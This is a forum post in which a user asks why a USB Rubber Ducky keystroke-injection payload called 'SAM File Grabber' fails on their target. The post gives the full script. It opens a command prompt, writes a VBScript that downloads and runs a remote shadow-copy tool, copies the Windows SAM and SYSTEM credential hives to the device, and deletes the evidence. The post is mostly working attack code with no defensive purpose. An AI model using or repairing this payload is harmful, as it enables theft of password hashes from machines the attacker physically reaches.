Jump to content

Recommended Posts

Posted

Hey everyone. 
I have a question. I am looking at the SAM File Grabber on a live system script and I cant seem to get it to work. I plug it in and the screen just goes crazy and then it doesnt copy anything over.

Here is the script I am using.

 

REM Modifications by overwraith
ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
ENTER
DELAY 400
REM THE NEXT LINE IS WHERE CHANGING THE DIRECTORY 
REM TO DESIRED DIRECTORY WOULD HAVE GONE. 
REM CHANGE DIRECTORY 'DUCKY' FLASH DRIVE. 
STRING for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A:)
ENTER
DELAY 800
STRING cd %DUCKYdrive%
DELAY 400
STRING copy con download.vbs
ENTER
STRING Set args = WScript.Arguments:a = split(args(0), "/")(UBound(split(args(0),"/")))
ENTER
STRING Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP"):objXMLHTTP.open "GET", args(0), false:objXMLHTTP.send()
ENTER
STRING If objXMLHTTP.Status = 200 Then
ENTER
STRING Set objADOStream = CreateObject("ADODB.Stream"):objADOStream.Open
ENTER
STRING objADOStream.Type = 1:objADOStream.Write objXMLHTTP.ResponseBody:objADOStream.Position = 0
ENTER
STRING Set objFSO = Createobject("Scripting.FileSystemObject"):If objFSO.Fileexists(a) Then objFSO.DeleteFile a
ENTER
STRING objADOStream.SaveToFile a:objADOStream.Close:Set objADOStream = Nothing 
ENTER
STRING End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing
ENTER
CTRL z
ENTER
STRING cscript download.vbs http://xxxxxxxxxxxxxxx/xxx/vssown.vbs
ENTER
DELAY 800
STRING del download.vbs
ENTER
DELAY 800
STRING cscript vssown.vbs /start
ENTER
DELAY 800
STRING cscript vssown.vbs /create
ENTER
DELAY 800
STRING copy \\DUCKY\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM .
ENTER
DELAY 800
STRING copy \\DUCKY\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM .
ENTER
DELAY 800
STRING cscript vssown.vbs /stop
ENTER
DELAY 800
STRING del vssown.vbs
ENTER
STRING exit
ENTER
REM Make sure to change the DIRECTORY above.

 

 

 

I changed 

STRING copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM .

to 

STRING copy \\DUCKY\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM .

Also the following:

 STRING copy \\?\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM

.

to 

STRING copy \\DUCKY\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM .

 

Ducky is the name of the MicroSD Card so would that be correct?

 

I changed

STRING cscript download.vbs http://tools.lanmaster53.com/vssown.vbs 

to a vbs script provided by LanMaster53 github account. 

https://github.com/lanmaster53/ptscripts/blob/master/windows/vssown.vbs and changed the URL to my site hosting it. 

 

 

What am I missing. It doesnt seem to work or dump any files back on the Rubber Duck. I am running the Twin Duck Firmware. 

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...